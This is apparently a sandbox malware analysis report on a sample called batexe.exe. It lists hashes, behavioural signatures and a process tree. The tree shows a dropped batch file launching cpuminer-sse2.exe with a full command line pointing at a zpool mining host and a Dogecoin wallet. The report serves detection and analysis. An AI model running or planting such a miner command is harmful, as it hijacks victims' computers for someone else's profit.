Analysis
-
max time kernel
294s -
max time network
304s -
platform
windows10-1703_x64 -
resource
win10-20240221-ja -
resource tags
arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
24/02/2024, 07:29
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240221-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20240221-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 3108 b2e.exe 4844 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 4844 cpuminer-sse2.exe 4844 cpuminer-sse2.exe 4844 cpuminer-sse2.exe 4844 cpuminer-sse2.exe 4844 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/1016-4-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1016 wrote to memory of 3108 1016 batexe.exe 73 PID 1016 wrote to memory of 3108 1016 batexe.exe 73 PID 1016 wrote to memory of 3108 1016 batexe.exe 73 PID 3108 wrote to memory of 4008 3108 b2e.exe 74 PID 3108 wrote to memory of 4008 3108 b2e.exe 74 PID 3108 wrote to memory of 4008 3108 b2e.exe 74 PID 4008 wrote to memory of 4844 4008 cmd.exe 77 PID 4008 wrote to memory of 4844 4008 cmd.exe 77
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Users\Admin\AppData\Local\Temp\9422.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\9422.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9422.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3108 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\97FA.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4844
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD51a4168b36d9208fe60c8a5f13973047a
SHA1857aa3c5a3693a17d86b1538bb48595ebddded15
SHA2560f8679966f82d9e654ebe8c9e12e5f287fe7f7dc1278e12f3a56e83142f121bb
SHA51233205588386b41fd9be8f535d1e878c5c31d4e10095f15dd776016e39e192af219c15814ea5e6ea8c827c6ded369825f9fc2735484db4a72f0833bdae5cb925d
-
Filesize
1.5MB
MD54dbb3875d20e9ee42958aa1932ebdc02
SHA19b87fa838e51626f8b6e49c3000524510d2cb15a
SHA256ba71e268c39da38a37f4aad72168a7ec8366de09acdc4c697d175ec81e7ee960
SHA512139a35bd4b6c90ceb0df8396a69c1dd8fa7664da0b28282a8edae74de245755f31c822433859c7e0bfe388aa1eb29109be5f49a3519d981f81efd7e52d978671
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
1.2MB
MD5fdce5ef1e72d32f5cf52abde5d675e23
SHA172ce4689cd894482ca82ca4889b5b33e036fc5c2
SHA25603c0fa61c1a4671898bff13f6cc92df9f0a0ee0872638ab87d11b3121447bad7
SHA512ed7652e97886fd658727c97471460caccebce3f7ab204db93ec7d6be214d177c7d8e768acb96ce277fe5dcfedf4dd223e3cae792902729b24b1ed719509a1b66
-
Filesize
1.3MB
MD55497e622fd648d8367807c84832ff509
SHA127c3a0acaf4f37bea600f72ff6f0737c81c7a512
SHA256d47a636e66028da805bbd0f2475823e9741334b9ab899492e4fc9a58a4d1255a
SHA5120d38648af8bdb17a1e4dd8bdab20a5ed373028c39d9799bfe9d0297c43f276fd1b897a4fa7f3e246aad9a847fc0e4651d347c02742da4c5837929e5a693af939
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
1.3MB
MD5e175338cf0d6db8d2934ee72e1cb7b07
SHA108dbaec5a5ea05b18606012b2afc695334d85b50
SHA25661ab1330c8b64cb722b443a98c215e38e0a8dec0407614897a0965d989c881b5
SHA5120c4863328a5c4b3b2498ae812d3546e03edcf267ba658549b258b132dbec9d27c7156ae9dfc9a6e4f2094ba11f6eb5f8524f3d8cb10ce511576198cedfa3e6fc
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.0MB
MD5598a77d5405978c0414fcafd9ac31428
SHA1789a7e140489358c3cd43a5bb8febd48c263e05a
SHA2560e2516f875a0d66fff314e6af0ee239c6394897b9817ed2bc85e0f82cd18b3fb
SHA512caf89fdf394a08cfe821283a741ee5c12c8197eec40aa1f33394f9c5a45d4d64a222be3397181c30a0c7bf592c925a11e6900473eb6400c6fb4b37b529b14a76
-
Filesize
786KB
MD59c48b48251816c1cf803602a9e9062e7
SHA12fbff795411bcbe450e7947fe6ef208f7cdd778b
SHA25657bd19b9b7cc76b26fdad4481f7a7c7b81708d7baecf1e377462e48a5f316017
SHA5124215f73226021f97c983da92b5778af1ee106fe18a52651b2c28ec38061048efb0c3bf4a29cd62b88d62cc7af269ab3f0f3d8c7afbc6031100131cbd2b753fe6
-
Filesize
682KB
MD531742133fb8fb336a0d99624e5295e03
SHA170e9e918a612d2a21812a97faeeedc2e8877f499
SHA256f1a60bacf43b58e30eb202f9a8d0f36b315121d29ad56ad96656de82364eed72
SHA512175cd679efc4566937e69f26f09b66d4ac8f949c0e50ae5a7d366d0bf6730dad9402c1f78e1bafd007e90ba7ca775a04a1396bb1122b60ab2cff92cb42f63ac1
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770